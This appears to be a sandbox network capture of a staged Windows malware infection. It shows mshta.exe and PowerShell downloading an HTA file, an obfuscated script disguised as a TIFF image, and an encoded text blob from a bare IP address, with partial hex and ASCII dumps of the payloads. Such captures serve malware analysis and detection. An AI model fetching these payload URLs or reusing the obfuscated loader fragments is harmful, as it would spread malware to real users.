                                                                                                                                            Oct 4, 2024 11:55:54.869885921 CEST1236INData Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39
                                                                                                                                            Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509
                                                                                                                                            Oct 4, 2024 11:55:54.869982004 CEST1236INData Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30
                                                                                                                                            Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                                                                                                                                            Oct 4, 2024 11:55:54.870191097 CEST1236INData Raw: 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35
                                                                                                                                            Data Ascii: 09%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25253A%252509%252509%252509%252509%252509%25
                                                                                                                                            Oct 4, 2024 11:55:54.870204926 CEST328INData Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39
                                                                                                                                            Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509
                                                                                                                                            Oct 4, 2024 11:55:54.875524998 CEST1236INData Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30
                                                                                                                                            Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            1192.168.2.2249168192.3.220.20803672C:\Windows\System32\mshta.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 11:55:56.865428925 CEST434OUTGET /97/ug/Newprojectupdatedwithmegreat.hta HTTP/1.1
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: fr-FR
                                                                                                                                            UA-CPU: AMD64
                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                            Range: bytes=8896-
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Host: 192.3.220.20
                                                                                                                                            If-Range: "1d4f7-623a08a0dc3cf"
                                                                                                                                            Oct 4, 2024 11:55:57.341001987 CEST1236INHTTP/1.1 206 Partial Content
                                                                                                                                            Date: Fri, 04 Oct 2024 09:55:57 GMT
                                                                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                            Last-Modified: Fri, 04 Oct 2024 06:11:18 GMT
                                                                                                                                            ETag: "1d4f7-623a08a0dc3cf"
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Content-Length: 111159
                                                                                                                                            Content-Range: bytes 8896-120054/120055
                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/hta
                                                                                                                                            Data Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 [TRUNCATED]
                                                                                                                                            Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25253A%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25
                                                                                                                                            Oct 4, 2024 11:55:57.341033936 CEST1236INData Raw: 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25
                                                                                                                                            Data Ascii: 2509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%
                                                                                                                                            Oct 4, 2024 11:55:57.341049910 CEST1236INData Raw: 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35
                                                                                                                                            Data Ascii: %252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
                                                                                                                                            Oct 4, 2024 11:55:57.341135025 CEST672INData Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30
                                                                                                                                            Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                                                                                                                                            Oct 4, 2024 11:55:57.341150045 CEST1236INData Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30
                                                                                                                                            Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                                                                                                                                            Oct 4, 2024 11:55:57.341166019 CEST1236INData Raw: 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35
                                                                                                                                            Data Ascii: %252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
                                                                                                                                            Oct 4, 2024 11:55:57.341180086 CEST1236INData Raw: 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32
                                                                                                                                            Data Ascii: 509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2
                                                                                                                                            Oct 4, 2024 11:55:57.341195107 CEST1236INData Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30
                                                                                                                                            Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                                                                                                                                            Oct 4, 2024 11:55:57.341407061 CEST1236INData Raw: 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35
                                                                                                                                            Data Ascii: 09%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25
                                                                                                                                            Oct 4, 2024 11:55:57.341422081 CEST552INData Raw: 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32
                                                                                                                                            Data Ascii: 509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2
                                                                                                                                            Oct 4, 2024 11:55:57.346251011 CEST1236INData Raw: 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25
                                                                                                                                            Data Ascii: 2509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            2192.168.2.2249169192.3.220.20803836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 11:56:03.302773952 CEST360OUTGET /97/picturewithgreatdayseverythinggood.tIF HTTP/1.1
                                                                                                                                            Accept: */*
                                                                                                                                            UA-CPU: AMD64
                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                            Host: 192.3.220.20
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Oct 4, 2024 11:56:03.781810045 CEST1236INHTTP/1.1 200 OK
                                                                                                                                            Date: Fri, 04 Oct 2024 09:56:03 GMT
                                                                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                            Last-Modified: Fri, 04 Oct 2024 05:59:00 GMT
                                                                                                                                            ETag: "51934-623a05e19feda"
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Content-Length: 334132
                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: image/tiff
                                                                                                                                            Data Raw: ff fe 64 00 57 00 57 00 4f 00 43 00 69 00 66 00 78 00 57 00 57 00 63 00 57 00 6b 00 61 00 66 00 66 00 65 00 71 00 69 00 74 00 67 00 75 00 66 00 5a 00 57 00 52 00 47 00 65 00 61 00 47 00 70 00 4f 00 4c 00 4c 00 69 00 6c 00 47 00 52 00 43 00 64 00 20 00 3d 00 20 00 22 00 75 00 69 00 53 00 4f 00 65 00 66 00 47 00 62 00 61 00 57 00 48 00 71 00 75 00 65 00 63 00 66 00 6b 00 43 00 4e 00 55 00 63 00 4c 00 6f 00 50 00 4b 00 7a 00 69 00 47 00 48 00 41 00 65 00 4c 00 4c 00 50 00 69 00 65 00 43 00 5a 00 48 00 69 00 76 00 22 00 0d 00 0a 00 66 00 63 00 73 00 6a 00 4c 00 61 00 41 00 69 00 6f 00 4c 00 6f 00 4b 00 7a 00 47 00 68 00 4b 00 57 00 4c 00 47 00 63 00 4c 00 6d 00 63 00 66 00 66 00 66 00 4e 00 47 00 4c 00 70 00 49 00 52 00 5a 00 69 00 61 00 57 00 6b 00 4e 00 69 00 69 00 20 00 3d 00 20 00 22 00 69 00 6d 00 70 00 69 00 4c 00 57 00 57 00 78 00 48 00 47 00 4e 00 63 00 52 00 4b 00 4c 00 43 00 68 00 63 00 47 00 72 00 4c 00 4b 00 75 00 47 00 61 00 55 00 47 00 42 00 4b 00 72 00 6b 00 55 00 47 00 6e 00 6b 00 65 00 [TRUNCATED]
                                                                                                                                            Data Ascii: dWWOCifxWWcWkaffeqitgufZWRGeaGpOLLilGRCd = "uiSOefGbaWHquecfkCNUcLoPKziGHAeLLPieCZHiv"fcsjLaAioLoKzGhKWLGcLmcfffNGLpIRZiaWkNii = "impiLWWxHGNcRKLChcGrLKuGaUGBKrkUGnkeWNeG"WunLHxUfcWvpWGmhdWhbLWoZfpovbiTriLNiLcxs = "fuoWQPmWTlucWvZGchikPCKqKScWzUKeWxzULLWt"BcdZACLLPWIWLKKUJKBiLmLLpAWWKekqfoWAOUsU = "bofLTIeNiWLhktheLUWkPlnkjBpqLAJWOUCqNbzP"bUNCLvBGhhKfedWeGriWWoxPUJuRPGieWbdNzWLN = "UiqAofLWZekczhrPCWffPuLrLhLLuzkkpoRAzUOL"QTlaWWzNKgdtKKLiWOnnKUWZ
                                                                                                                                            Oct 4, 2024 11:56:03.781868935 CEST1236INData Raw: 00 61 00 55 00 52 00 48 00 54 00 42 00 6b 00 73 00 4c 00 57 00 4e 00 55 00 6d 00 69 00 4c 00 57 00 20 00 3d 00 20 00 22 00 4c 00 4b 00 62 00 69 00 6c 00 62 00 69 00 57 00 6b 00 63 00 49 00 75 00 69 00 47 00 50 00 70 00 6f 00 72 00 71 00 76 00 71
                                                                                                                                            Data Ascii: aURHTBksLWNUmiLW = "LKbilbiWkcIuiGPporqvqGtfdfpZKquequelKipgWi"xmfiibjLzKWKesLUknkzhCGKzkstxGUUWPLpiLdp = "nGAAbtNGNuZi
                                                                                                                                            Oct 4, 2024 11:56:03.781903028 CEST448INData Raw: 00 4c 00 4f 00 4c 00 50 00 6d 00 4c 00 49 00 69 00 63 00 5a 00 78 00 20 00 3d 00 20 00 22 00 4e 00 63 00 5a 00 63 00 5a 00 75 00 4c 00 4b 00 42 00 4c 00 4c 00 51 00 62 00 62 00 7a 00 63 00 71 00 42 00 4c 00 6f 00 5a 00 6e 00 73 00 43 00 69 00 68
                                                                                                                                            Data Ascii: LOLPmLIicZx = "NcZcZuLKBLLQbbzcqBLoZnsCihruKJozbjpklWWW"cBBNPeJceCNOWAilqLNGmWnJKWdvqcaWCUbOPhUb = "hxfGZGKUSiLfeWibUrL
                                                                                                                                            Oct 4, 2024 11:56:03.781934977 CEST1236INData Raw: 00 55 00 43 00 47 00 52 00 64 00 22 00 0d 00 0a 00 6b 00 69 00 6c 00 4e 00 6f 00 6b 00 57 00 64 00 66 00 57 00 64 00 50 00 4b 00 4b 00 43 00 70 00 6c 00 57 00 63 00 47 00 68 00 6e 00 66 00 53 00 47 00 47 00 4a 00 4c 00 6e 00 4f 00 7a 00 68 00 63
                                                                                                                                            Data Ascii: UCGRd"kilNokWdfWdPKKCplWcGhnfSGGJLnOzhcinSuiok = "ioSiWLtSPjZiWoksAWZllzUGfZWGOoHOlkUptetk"APZLeeOdcUaWKWRagRKcBgbPWB
                                                                                                                                            Oct 4, 2024 11:56:03.781987906 CEST1236INData Raw: 00 0d 00 0a 00 6e 00 52 00 57 00 4e 00 6e 00 4c 00 6f 00 4c 00 6b 00 72 00 47 00 68 00 4b 00 6f 00 52 00 50 00 57 00 68 00 54 00 57 00 4c 00 47 00 7a 00 55 00 53 00 4b 00 71 00 4b 00 63 00 57 00 43 00 43 00 63 00 43 00 78 00 43 00 70 00 52 00 6b
                                                                                                                                            Data Ascii: nRWNnLoLkrGhKoRPWhTWLGzUSKqKcWCCcCxCpRkN = "ikLKuLOkmefSLGdiWZWeLxceTKvhBLzWaOWWiLct"LoUQtiKioBLGqueiPijaiceiiLLpmLhp
                                                                                                                                            Oct 4, 2024 11:56:03.782020092 CEST1236INData Raw: 00 63 00 55 00 47 00 43 00 74 00 41 00 57 00 6c 00 68 00 50 00 72 00 52 00 4e 00 6d 00 47 00 69 00 57 00 7a 00 6b 00 52 00 6a 00 71 00 6d 00 4b 00 57 00 6b 00 66 00 57 00 63 00 61 00 4b 00 71 00 66 00 6b 00 64 00 42 00 20 00 3d 00 20 00 22 00 4c
                                                                                                                                            Data Ascii: cUGCtAWlhPrRNmGiWzkRjqmKWkfWcaKqfkdB = "LcZpZiZpPlWoLOCGURaumAUUpKlieKcGGiNKpckh"KpmWLhoIUeipmpPcxaNnipNmkceNrhPiPUux
                                                                                                                                            Oct 4, 2024 11:56:03.782053947 CEST1236INData Raw: 00 51 00 4b 00 75 00 66 00 48 00 4c 00 63 00 4c 00 49 00 64 00 4a 00 4b 00 70 00 63 00 4f 00 74 00 70 00 75 00 4b 00 6b 00 4c 00 4e 00 52 00 62 00 66 00 41 00 69 00 4c 00 55 00 7a 00 20 00 3d 00 20 00 22 00 55 00 6e 00 78 00 4c 00 41 00 69 00 4c
                                                                                                                                            Data Ascii: QKufHLcLIdJKpcOtpuKkLNRbfAiLUz = "UnxLAiLiaafvKPLiHLOKWmzbkWGblKfzPQIiQiPL"qAdcLCvhcLWtgRtpoKkWnZGooZuUjnCLjeiKNhWo = "
                                                                                                                                            Oct 4, 2024 11:56:03.782088995 CEST328INData Raw: 00 6f 00 54 00 6f 00 62 00 67 00 50 00 69 00 74 00 50 00 53 00 66 00 55 00 4b 00 65 00 6b 00 54 00 70 00 4c 00 70 00 57 00 66 00 20 00 3d 00 20 00 22 00 68 00 55 00 47 00 4c 00 69 00 65 00 6f 00 66 00 5a 00 41 00 47 00 63 00 78 00 73 00 65 00 64
                                                                                                                                            Data Ascii: oTobgPitPSfUKekTpLpWf = "hUGLieofZAGcxsedmlsUpaBlsnxuepLKibbsbLft"vcLPKKPcanrGWRWfocCUxKfmleoUGBuAcNrKLtGU = "NCmLeSnBK
                                                                                                                                            Oct 4, 2024 11:56:03.782126904 CEST1236INData Raw: 00 48 00 57 00 68 00 6b 00 6f 00 64 00 4c 00 63 00 4e 00 69 00 47 00 75 00 57 00 50 00 50 00 5a 00 6e 00 52 00 41 00 69 00 67 00 57 00 65 00 7a 00 57 00 4c 00 43 00 55 00 6b 00 4c 00 78 00 20 00 3d 00 20 00 22 00 6e 00 62 00 65 00 4c 00 70 00 75
                                                                                                                                            Data Ascii: HWhkodLcNiGuWPPZnRAigWezWLCUkLx = "nbeLpumkASuLkLLUkWCWkHRqcvOWdBlaTbSSjnkW"LBikhqmhNOhUegcGiiaURnoxWoOhcbeKfdLWmcLA =
                                                                                                                                            Oct 4, 2024 11:56:03.782160997 CEST1236INData Raw: 00 61 00 50 00 61 00 47 00 68 00 65 00 53 00 70 00 63 00 4b 00 6b 00 7a 00 65 00 74 00 69 00 4e 00 68 00 69 00 50 00 66 00 50 00 6d 00 42 00 6e 00 6d 00 20 00 3d 00 20 00 22 00 74 00 4b 00 50 00 65 00 57 00 4b 00 49 00 75 00 71 00 6b 00 65 00 47
                                                                                                                                            Data Ascii: aPaGheSpcKkzetiNhiPfPmBnm = "tKPeWKIuqkeGsUkLcGiGTWIjNzifRWWqaikZacJL"rGuIUkzCrNpqZHorhUhWmWKJLUmsQkWLpucnrbvQ = "BijNz
                                                                                                                                            Oct 4, 2024 11:56:03.787516117 CEST1236INData Raw: 00 47 00 4f 00 69 00 41 00 55 00 69 00 54 00 50 00 52 00 42 00 55 00 69 00 4b 00 57 00 4b 00 4c 00 4b 00 20 00 3d 00 20 00 22 00 4c 00 70 00 47 00 63 00 70 00 4c 00 6b 00 6e 00 47 00 68 00 6a 00 55 00 55 00 4c 00 6b 00 57 00 41 00 5a 00 63 00 78
                                                                                                                                            Data Ascii: GOiAUiTPRBUiKWKLK = "LpGcpLknGhjUULkWAZcxlpUROPHKqOCbZCaamLbW"cLtWiWRQlpoSzcUHIkGpLPluWllWzWKWWUxLfjiL = "efTLRzzWmLC


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            3192.168.2.2249172192.3.220.20803228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 11:56:12.926043987 CEST75OUTGET /97/RFGBVV.txt HTTP/1.1
                                                                                                                                            Host: 192.3.220.20
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Oct 4, 2024 11:56:13.409951925 CEST1236INHTTP/1.1 200 OK
                                                                                                                                            Date: Fri, 04 Oct 2024 09:56:13 GMT
                                                                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                            Last-Modified: Fri, 04 Oct 2024 05:54:52 GMT
                                                                                                                                            ETag: "a1000-623a04f4ff97e"
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Content-Length: 659456
                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: text/plain
                                                                                                                                            Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 71 38 67 49 50 73 78 44 54 38 77 43 50 49 73 44 2f 37 77 39 4f 77 75 44 6c 37 51 33 4f 55 74 44 4d 37 41 68 4f 73 72 44 7a 36 77 71 4f 4d 71 44 62 36 51 6b 4f 6f 6f 44 45 36 67 67 4f 45 6f 44 41 35 77 66 4f 34 6e 44 39 35 41 36 4d 30 4d 44 4d 79 51 71 4d 67 4b 44 68 79 41 6f 4d 38 4a 44 63 79 67 6c 4d 49 4a 44 4f 79 67 69 4d 59 45 44 36 78 67 64 4d 55 48 44 30 78 77 63 4d 49 48 44 78 78 41 63 4d 38 47 44 75 78 77 61 4d 6f 47 44 70 78 41 61 4d 63 47 44 6d 78 51 5a 4d 51 47 44 6a 78 67 59 4d 34 46 44 64 78 41 48 41 41 41 41 6a 41 63 41 45 41 34 44 74 2b 41 71 50 59 36 44 68 2b 77 6e 50 30 35 44 62 2b 67 6d 50 67 35 44 54 2b 51 6b 50 77 34 44 4b 2b 41 69 50 59 34 44 46 2b 41 68 50 4d 34 44 43 2b 41 51 50 38 33 44 39 39 41 65 50 59 33 44 78 39 77 62 50 30 32 44 72 39 67 [TRUNCATED]
                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwDq8gIPsxDT8wCPIsD/7w9OwuDl7Q3OUtDM7AhOsrDz6wqOMqDb6QkOooDE6ggOEoDA5wfO4nD95A6M0MDMyQqMgKDhyAoM8JDcyglMIJDOygiMYED6xgdMUHD0xwcMIHDxxAcM8GDuxwaMoGDpxAaMcGDmxQZMQGDjxgYM4FDdxAHAAAAjAcAEA4Dt+AqPY6Dh+wnP05Db+gmPg5DT+QkPw4DK+AiPY4DF+AhPM4DC+AQP83D99AePY3Dx9wbP02Dr9gYPA2De9QXPY1DO9QTPYwD+8gNP4yDm8gHPYxDO8gxO4vD27g7OYuDe7g1O4sDG6gvOYrDu6gpO4pDW6gjO0oDG5gfOYnDu5gZO8lDe5AXOQlDM5ABOwjD04ALOQiDc4AFOwgDF4gwNofDy3g6NIeDa3g0NocDC2QvNsbD62AuNYbD02wsNgaDm2woNoZDW2QlN4YDN2whNYYDE1QfNwXD61AZNEWDZ1gVNQVDP1QTNwUDL1QSNcUDF1AAN4TD90APNoTD40gNNETDv0gKNgSDn0gJNQSDi0AINsRDZ0AGNYRDU0gENERDK0QCNMMD/zg8MAPDtzQ6MwNDazw1MMNDGzAxMEID9yAsM4KDrywpMoJDYyQlMEJDEygQM8HD7xgbMwGDpxQZMgFDWxwUM8EDCxAAM0DD7wQOMwCDqwwJMUCDjwgFMQBDRwwDM0ADAAAQAQCgBgDwP4/D7/w9Po+Do/Q5PE+DU/g0P88DL/wxPI4Dx+wrPw6Do+ApP85DO+AjPk4DF9AePYnDi5AXOolDZ5AWOQlDT5wTOkkDH5gROUkDE5wQOIgD+4QPOkjDz4QMOAjDv4
                                                                                                                                            Oct 4, 2024 11:56:13.409998894 CEST224INData Raw: 67 4c 4f 30 69 44 73 34 41 4b 4f 63 69 44 6a 34 51 48 4f 73 68 44 61 34 51 47 4f 67 68 44 58 34 77 45 4f 49 68 44 4f 34 41 43 4f 59 67 44 46 34 41 42 4f 4d 67 44 43 33 67 2f 4e 30 66 44 35 33 77 38 4e 45 66 44 77 33 77 37 4e 73 65 44 71 33 67 35
                                                                                                                                            Data Ascii: gLO0iDs4AKOciDj4QHOshDa4QGOghDX4wEOIhDO4ACOYgDF4ABOMgDC3g/N0fD53w8NEfDw3w7NseDq3g5NUeDh3w2NkdDY3A1N4cDM3wyNocDJ3QhN8bD+2AuNYbD12AtNMbDy2grN0aDp2woNEaDg2AnNsZDX2QkN8YDO2QjNkYDI2ARN4XD81weNoXD51QdNQXDw1gaNgWDn1gZNUWDh1AYNwVDW1
